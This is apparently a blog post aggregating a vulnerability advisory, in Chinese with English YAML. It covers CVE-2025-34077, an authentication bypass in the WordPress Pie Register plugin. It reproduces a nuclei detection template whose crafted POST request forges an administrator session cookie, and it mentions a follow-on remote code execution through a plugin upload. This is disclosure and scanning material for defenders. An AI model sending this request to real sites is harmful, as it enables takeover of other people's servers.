WordPress Pie Register Authentication Bypass Vulnerability

漏洞信息

漏洞名称: WordPress Pie Register Authentication Bypass Vulnerability

漏洞编号:

  • CVE: CVE-2025-34077

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: WordPress Pie Register插件是一个广泛使用的WordPress用户注册插件,用于增强WordPress网站的用户注册和管理功能。该插件通常部署在需要用户注册功能的网站上,如会员制网站、论坛等。由于其广泛的应用,该插件的安全性对许多网站至关重要。该插件在3.7.1.4及之前版本中存在一个认证绕过漏洞,允许未经认证的攻击者通过提交特制的POST请求到登录端点,绕过认证机制。攻击者可以通过设置social_site=true并操纵user_id_social_site参数,为任意用户ID(包括管理员)生成有效的WordPress会话cookie。一旦认证成功,攻击者可能利用插件上传功能安装包含任意PHP代码的恶意插件,从而导致在底层服务器上执行远程代码。这种漏洞的存在主要是因为插件在处理用户认证请求时未能正确验证用户输入,导致认证机制被绕过。此漏洞的利用可能导致网站被完全控制,数据泄露,甚至服务器被入侵,且攻击者无需任何认证即可利用此漏洞,极大地增加了安全风险。

产品厂商: WordPress

产品名称: Pie Register

影响版本: <= 3.7.1.4

搜索语法: /wp-content/plugins/pie-register/

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b9fc3e5b0b74ff6f764085abd74e0fe1f04c9cc1/http%2Fcves%2F2025%2FCVE-2025-34077.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: CVE-2025-34077

info:
  name: WordPress Pie Register <= 3.7.1.4 - Authentication Bypass
  author: kylew1004
  severity: critical
  description: |
    An authentication bypass vulnerability exists in the WordPress Pie Register plugin ≤ 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators.Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.
  reference:
    - https://github.com/MrjHaxcore/CVE-2025-34077
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34077
    - https://securityvulnerability.io/vulnerability/CVE-2025-34077
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/pie-register/"
  tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null

    matchers:
      - type: dsl
        dsl:
          - "contains(set_cookie,'wordpress_logged_in_')"
          - "status_code==302"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
WordPress Pie Register Authentication Bypass Vulnerability
http://example.com/2025/07/28/github_210561465/
作者
lianccc
发布于
2025年7月28日
许可协议